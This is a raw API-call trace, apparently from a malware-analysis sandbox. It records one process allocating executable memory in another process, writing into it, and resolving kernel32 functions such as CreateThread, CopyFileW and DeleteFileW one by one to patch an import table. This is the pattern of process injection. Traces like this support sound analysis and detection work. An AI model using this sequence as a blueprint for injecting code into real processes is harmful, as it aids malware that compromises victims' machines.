	[0230.147] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0230.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.147] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.147] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0230.148] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0230.148] ResetEvent (hEvent=0x60c) returned 1
	[0230.148] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.148] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0230.148] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.148] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.148] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.149] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.149] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.149] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.149] lstrlenA (lpString="CloseHandle") returned 11
	[0230.149] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.149] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750590*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750590*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0230.149] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.149] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.149] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.150] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.150] ResetEvent (hEvent=0x60c) returned 1
	[0230.150] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.150] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.150] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.151] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.151] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4714c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.151] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.151] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.151] lstrlenA (lpString="CopyFileW") returned 9
	[0230.151] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.151] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275059e*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275059e*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0230.152] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.152] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.152] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.152] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.153] ResetEvent (hEvent=0x60c) returned 1
	[0230.153] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.153] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.153] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.153] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.153] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.153] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47150, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.154] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.154] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.154] lstrlenA (lpString="CreateFileW") returned 11
	[0230.154] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.154] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27505aa*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27505aa*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0230.154] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.154] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.154] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.155] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.155] ResetEvent (hEvent=0x60c) returned 1
	[0230.155] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.155] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.155] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.155] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.155] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.155] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47154, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.156] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.156] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.156] lstrlenA (lpString="CreateThread") returned 12
	[0230.156] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.156] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27505b8*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27505b8*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0230.156] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.157] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.157] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.157] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.157] ResetEvent (hEvent=0x60c) returned 1
	[0230.157] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.157] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.157] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.158] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.158] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.158] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47158, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.158] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.158] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.158] lstrlenA (lpString="DeleteFileW") returned 11
	[0230.158] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.158] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27505c8*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27505c8*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0230.159] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.159] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.159] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.159] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.160] ResetEvent (hEvent=0x60c) returned 1
	[0230.160] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.160] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.160] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.160] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.160] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4715c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.160] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.161] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.161] lstrlenA (lpString="GetComputerNameW") returned 16
	[0230.161] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.161] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27505d6*, nSize=0x11, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27505d6*, lpNumberOfBytesWritten=0x12858c*=0x11) returned 1
	[0230.161] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.161] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.161] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.161] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.162] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.162] ResetEvent (hEvent=0x60c) returned 1
	[0230.162] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.162] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.162] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.162] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.162] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.162] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47160, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.163] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.163] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.163] lstrlenA (lpString="GetLastError") returned 12
	[0230.163] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.163] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27505ea*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27505ea*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0230.164] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.164] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.164] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.164] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.164] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.164] ResetEvent (hEvent=0x60c) returned 1
	[0230.164] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.165] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.165] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.165] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.165] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.165] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47164, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.165] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.165] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.166] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0230.166] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.166] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27505fa*, nSize=0x11, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27505fa*, lpNumberOfBytesWritten=0x12858c*=0x11) returned 1
	[0230.166] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.166] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.166] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.166] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.167] ResetEvent (hEvent=0x60c) returned 1
	[0230.167] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.167] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.167] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.167] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.167] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.167] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47168, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.168] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.168] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.168] lstrlenA (lpString="HeapAlloc") returned 9
	[0230.168] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.168] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275060e*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275060e*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0230.168] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.168] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.168] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.168] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.169] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.169] ResetEvent (hEvent=0x60c) returned 1
	[0230.169] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.169] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.169] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.169] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.169] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.170] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4716c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.170] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.170] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.170] lstrlenA (lpString="HeapCreate") returned 10
	[0230.170] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.170] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275061a*, nSize=0xb, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275061a*, lpNumberOfBytesWritten=0x12858c*=0xb) returned 1
	[0230.171] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.171] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.171] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.171] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.171] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.171] ResetEvent (hEvent=0x60c) returned 1
	[0230.171] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.172] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
